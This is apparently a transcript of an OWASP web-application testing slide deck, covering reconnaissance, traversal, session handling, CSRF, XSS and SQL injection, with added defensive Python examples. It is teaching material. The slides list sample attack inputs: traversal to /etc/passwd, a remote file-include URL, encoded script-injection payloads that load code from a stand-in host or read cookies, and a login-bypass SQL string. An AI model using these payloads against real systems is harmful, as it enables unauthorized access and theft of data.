This document provides an overview of the Open Web Application Security Project (OWASP). It discusses OWASP's mission to improve application security and lists some of its key projects, including the OWASP Top Ten, a list of the most critical web application security flaws. It also summarizes several common security testing techniques like information gathering, authentication testing, session management testing, and input validation testing. Tools are mentioned for each technique.
13. Information Gathering
Application Discovery
Related issues:
Different base URL
Non-standard ports
Virtual hosts
14. Information Gathering
Application Discovery
Different base URL:
Directory exploration?
Google (site:www.example.com)
Candidate URLs (e.g. from Nessus)
15. Information Gathering
Application Discovery
Non-standard ports:
nmap -P0 -sT -sV -p1-65535 192.168.1.100
Interesting ports on 192.168.1.100:
(The 65527 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
443/tcp open ssl OpenSSL
901/tcp open http Samba SWAT administration server
16. Information Gathering
Application Discovery
Virtual hosts:
$ host -t ns www.owasp.org
www.owasp.org is an alias for owasp.org.
owasp.org name server ns1.secure.net.
owasp.org name server ns2.secure.net.
http://searchdns.netcraft.com/?host
17. Information Gathering
Spidering and Googling
Spidering:
wget -r http://www.example.com
Googling:
googlegath.pl
http://www.nothink.org/perl/googlegath/
18. Information Gathering
SSL/TLS Testing
Vulnerability Scanners:
Expired certificates
Weak Ciphers
...
Other tools: OpenSSL, SSLDigger
19. Information Gathering
Testing for File Extensions Handling
Identify underlying technologies
Tools:
wget
curl
web mirroring tools
vulnerability scanners
20. Information Gathering
Application Configuration Management Testing
Typical files and known directories
Be careful with HTML comments
Customize error pages
Only load necessary modules
Minimise privileges
Log access (successful and failed requests)
21. Information Gathering
Old, Backup and Unreferenced Files
Site map and technology clues
Content clues
Practices:
look into robots.txt, sitemaps files
public information (cache: site:)
search files: ~ .old .bak...
22. Information Gathering
Old, Backup and Unreferenced Files
Do not use mod_autoindex and mod_info (hide unnecessary information)
Correct file permissions
Use CHROOT
Logging recommendations
23. Nessus
http://www.nessus.org
Port Scanner
Vulnerability Scanner
30. Authentication
Directory traversal/file include
Known as “dot-dot-slash”
2 evaluation steps:
Input vectors enumeration
Testing Techniques
31. Authentication
Directory traversal/file include
Input vectors enumeration:
HTTP GET and POST requests
File loading
HTML forms
...
32. Authentication
Directory traversal/file include
Testing Techniques:
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
CAREFUL WITH CHARACTER ENCODING!
%2e%2e%2f is ../
%2e%2e/ is ../
..%2f is ../
%2e%2e%5c is ..\
..%5c is ..\
%2e%2e is ..
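A defensive counterpart to the encoding table above, added here as an example (not code from the slides or from OWASP): it percent-decodes a user-supplied path until it is stable (so double-encoded forms such as %252e, which go beyond the slide's single-encoded list, are also caught), treats backslashes like slashes, and then resolves the result against a base directory and refuses anything that escapes it. The sample inputs and the base directory /var/www/profiles are constructed for the example.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed sample inputs; the first four mirror the encodings from the slide
# (the double-encoded one is an added generalization), the last is a benign path.
SAMPLE_INPUTS = [
    "../../../../etc/passwd",
    "%2e%2e%2fetc/passwd",
    "..%5c..%5cwindows%5cwin.ini",
    "%252e%252e%252fetc/passwd",
    "profiles/alice.html",
]


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until the string stops changing.

    A single unquote() turns %252e into %2e, which is why one round is not enough.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def contains_traversal(value: str) -> bool:
    """True if any path segment, after decoding, is '..' (with / or \\ separators)."""
    decoded = fully_decode(value).replace("\\", "/")
    return any(segment == ".." for segment in decoded.split("/"))


def safe_join(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path under base_dir; return None if the result leaves base_dir.

    realpath() collapses '..' and symlinks, so the prefix check is done on the
    canonical path rather than on the raw string. An absolute user_path would
    replace base_dir in os.path.join, and is rejected by the same prefix check.
    """
    base = os.path.realpath(base_dir)
    cleaned = fully_decode(user_path).replace("\\", "/")
    candidate = os.path.realpath(os.path.join(base, cleaned))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def check_all(base_dir: str = "/var/www/profiles") -> dict:
    """Classify every constructed sample: True means the input is rejected."""
    return {
        value: contains_traversal(value) or safe_join(base_dir, value) is None
        for value in SAMPLE_INPUTS
    }


if __name__ == "__main__":
    for value, rejected in check_all().items():
        print(f"{'REJECT' if rejected else 'accept'}  {value}")
```

The string check and the canonical-path check are deliberately both present: the first gives a clear rejection reason for logging, the second is the one that actually guarantees the file stays inside the base directory.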
33. Authentication
Directory traversal/file include
Tools:
WebScarab
Paros
Burp Suite
34. Authentication
Vulnerable remember password and pwd reset
"Security questions":
Multiple questions
Strong questions
Number of attempts
CAPTCHA
Sending to email
35. Authentication
Vulnerable remember password and pwd reset
Careful with “Remember password”:
<INPUT TYPE="password" AUTOCOMPLETE="off">
If password is into a Cookie:
In a hashed form
36. Session Management
Logout and Browser Cache Management Testing
End Web Session:
• The user logs out
• The user remains idle for a certain amount of time and the application automatically logs him/her out
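The two ways of ending a session listed above, implemented server-side as an added example (not code from the slides or from OWASP): a small session store that invalidates a session on explicit logout and on an idle timeout, and additionally on an absolute lifetime, which the slide does not mention and is included as a common extension. The timeout values and the injectable clock are assumptions made for the example.

```python
import secrets
import time
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 15 * 60        # assumed: 15 minutes without a request ends the session
ABSOLUTE_TIMEOUT = 8 * 3600   # assumed: no session lives longer than 8 hours


class SessionStore:
    """In-memory session table keyed by a random, unguessable session id."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock          # injectable so expiry can be tested deterministically
        self._sessions: Dict[str, dict] = {}

    def create(self, user: str) -> str:
        sid = secrets.token_urlsafe(32)   # 256 bits of randomness from the OS CSPRNG
        now = self._clock()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """Return the user for a live session, or None if it is unknown or expired.

        Expired sessions are removed on the spot, so an old cookie cannot be
        replayed later, and a successful lookup refreshes the idle timer.
        """
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        idle_for = now - session["last_seen"]
        age = now - session["created"]
        if idle_for > IDLE_TIMEOUT or age > ABSOLUTE_TIMEOUT:
            self.logout(sid)
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, sid: str) -> None:
        """Explicit logout: drop the server-side record, not just the browser cookie."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")
    print("live:", store.lookup(sid))
    store.logout(sid)
    print("after logout:", store.lookup(sid))
```

Invalidating on the server is the part that matters: clearing the cookie in the browser alone leaves a copied session id usable until it expires.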
43. Session Management
Cross Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated.
Recommended practices:
Add session-related information in URLs
Use POST
Intermediate pages (“Are you sure you really want to do this?”)
Use REFERER headers
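The recommended practices above combined into one server-side check, added here as an example (not code from the slides or from OWASP): state-changing actions must arrive by POST, must carry a per-session secret (the form-field token stands in for the slide's "session-related information in URLs"), and the Origin or Referer header must name the site's own origin. The site origin https://app.example.com, the header and form dictionaries and the field name csrf_token are assumptions made for the example.

```python
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlparse

SITE_ORIGIN = "https://app.example.com"   # assumed: the application's own origin


def new_session_token() -> str:
    """Generate the per-session CSRF secret; store it server-side with the session."""
    return secrets.token_urlsafe(32)


def check_state_changing_request(method: str, headers: Dict[str, str],
                                 form: Dict[str, str], session_token: str) -> Tuple[bool, str]:
    """Return (accepted, reason) for a request that would change server state."""
    # 1. Only POST: a GET can be triggered by any <img> or link on a foreign page.
    if method.upper() != "POST":
        return False, "state-changing actions must use POST"

    # 2. Synchronizer token: a foreign page cannot read the victim's session secret,
    #    so it cannot put the right value in the form. Constant-time comparison.
    submitted = form.get("csrf_token", "")
    if not submitted or not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return False, "missing or mismatched CSRF token"

    # 3. Origin/Referer: reject requests whose source is another origin. Absent
    #    headers are rejected here; treating them as acceptable is a policy choice.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin/Referer header to verify"
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != SITE_ORIGIN:
        return False, "request source is a different origin"

    return True, "ok"


if __name__ == "__main__":
    token = new_session_token()
    # Constructed requests: one legitimate, one forged from another site.
    good = check_state_changing_request(
        "POST", {"Referer": "https://app.example.com/account"}, {"csrf_token": token}, token)
    forged = check_state_changing_request(
        "POST", {"Referer": "https://evil.example.net/page"}, {"csrf_token": ""}, token)
    print(good, forged)
```

The token check alone defeats a classic CSRF; the method and origin checks are cheap extra layers, and the slide's confirmation page serves the same purpose for a user who clicked something unexpected.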
44. Data Validation
XSS (Cross Site Scripting)
XSS: code injection attacks against the various interpreters in the browser.
http://server/cgi-bin/testcgi.exe?<SCRIPT>alert("Cookie"+document.cookie)</SCRIPT>
<script src=http://www.example.com/malicious-code.js></script>
%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e
Review all input vectors
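The variants above are the same payload under three encodings, which is what makes naive filtering fail. Added here as an example (not code from the slides or from OWASP): a normalizer that undoes percent- and \x-encoding before looking for a script tag, next to the actual fix, which is encoding untrusted data on output with html.escape. The sample strings are constructed to mirror the slide's variants.

```python
import html
import re
from urllib.parse import unquote

# Constructed samples: the slide's variants plus one benign value.
SAMPLES = [
    '<SCRIPT>alert("Cookie"+document.cookie)</SCRIPT>',
    '<script src=http://www.example.com/malicious-code.js></script>',
    '%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e',
    '\\x3cscript src=http://www.example.com/malicious-code.js\\x3e\\x3c/script\\x3e',
    'Alice Smith',
]

_HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
_SCRIPT_TAG = re.compile(r'<\s*script\b', re.IGNORECASE)


def normalize(value: str) -> str:
    """Undo the encodings an attacker uses to hide '<': %3c and \\x3c."""
    value = unquote(value)                                   # %3c -> <
    value = _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)  # \x3c -> <
    return value


def looks_like_script_injection(value: str) -> bool:
    """Detection helper for logging/alerting; it is not the defence itself."""
    return _SCRIPT_TAG.search(normalize(value)) is not None


def render_untrusted(value: str) -> str:
    """The real fix: encode on output so the browser never sees a tag.

    quote=True also escapes ' and ", so the value is safe inside attributes.
    """
    return html.escape(value, quote=True)


def classify(values=SAMPLES) -> dict:
    """Map each sample to (flagged_by_detector, safe_html_rendering)."""
    return {v: (looks_like_script_injection(v), render_untrusted(v)) for v in values}


if __name__ == "__main__":
    for value, (flagged, rendered) in classify().items():
        print(f"{'FLAG' if flagged else 'ok  '}  {rendered}")
```

Detection by pattern is brittle by nature (there are many more encodings than the three shown), so it belongs in monitoring; output encoding is what should decide what reaches the browser.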
45. Data Validation
XSS (Cross Site Scripting)
Tools:
OWASP CAL9000
46. Data Validation
SQL Injection
Insertion or "injection" of an SQL query via the input data from the client to the application.
Example:
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
Input:
$username = 1' or '1' = '1
$password = 1' or '1' = '1
SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
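The query above run both ways, as an added example (not code from the slides or from OWASP): the vulnerable version builds the statement by string concatenation exactly as the slide shows, the fixed version passes the same values as bound parameters. An in-memory SQLite database with two constructed user rows stands in for the application's database.

```python
import sqlite3
from typing import List, Tuple

# The slide's payload, used for both fields.
INJECTION = "1' or '1' = '1"


def build_db() -> sqlite3.Connection:
    """Constructed sample database: two users with (deliberately plain) passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """Builds the query by concatenation; the input becomes part of the SQL."""
    query = (f"SELECT * FROM Users WHERE Username='{username}' "
             f"AND Password='{password}'")
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """Binds the values as parameters; the quotes in the input are just data."""
    return conn.execute(
        "SELECT * FROM Users WHERE Username=? AND Password=?",
        (username, password),
    ).fetchall()


def compare() -> Tuple[int, int]:
    """Row counts returned for the injection payload: (vulnerable, parameterized)."""
    conn = build_db()
    vulnerable_rows = login_vulnerable(conn, INJECTION, INJECTION)
    safe_rows = login_parameterized(conn, INJECTION, INJECTION)
    return len(vulnerable_rows), len(safe_rows)


if __name__ == "__main__":
    print("rows returned (vulnerable, parameterized):", compare())
```

With the payload in both fields the concatenated WHERE clause is true for every row (OR binds weaker than AND, so the trailing '1'='1' matches everything), while the parameterized query looks for a user literally named 1' or '1' = '1 and finds nothing. Valid credentials behave identically in both versions.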
48. Data Validation
Other Injections
LDAP Injection (Lightweight Directory Access Protocol)
ORM Injection (Hibernate in Java, NHibernate in .NET, ActiveRecord in Ruby on Rails)
XML Injection
SSI Injection
XPATH Injection
IMAP/SMTP Injection
System commands Injection
49. Data Validation
Buffer overflow
Issues caused by buffer overflows:
Denial of service (DoS)
Code Injection
Code execution
Practices:
Update software
Best practices
50. Denial of Service
User account lockout (use CAPTCHAs)
Buffer overflows
User-specified object allocation
User input as a loop counter
User-provided data written to disk
Failure to release resources
Storing too much data in the session
51. Web Services
XML Structural Testing
Overloading the XML parser
XML Content-level Testing
XML/SQL/XPath... Injections
Validate Input Size
Naughty SOAP Attachments Testing
Man-in-the-middle Testing
52. AJAX Testing
Increased attack surface with many more inputs to secure
Exposed internal functions of the application
Client access to third-party resources with no built-in security and encoding mechanisms
Failure to protect authentication information and sessions
Blurred line between client-side and server-side code, resulting in security mistakes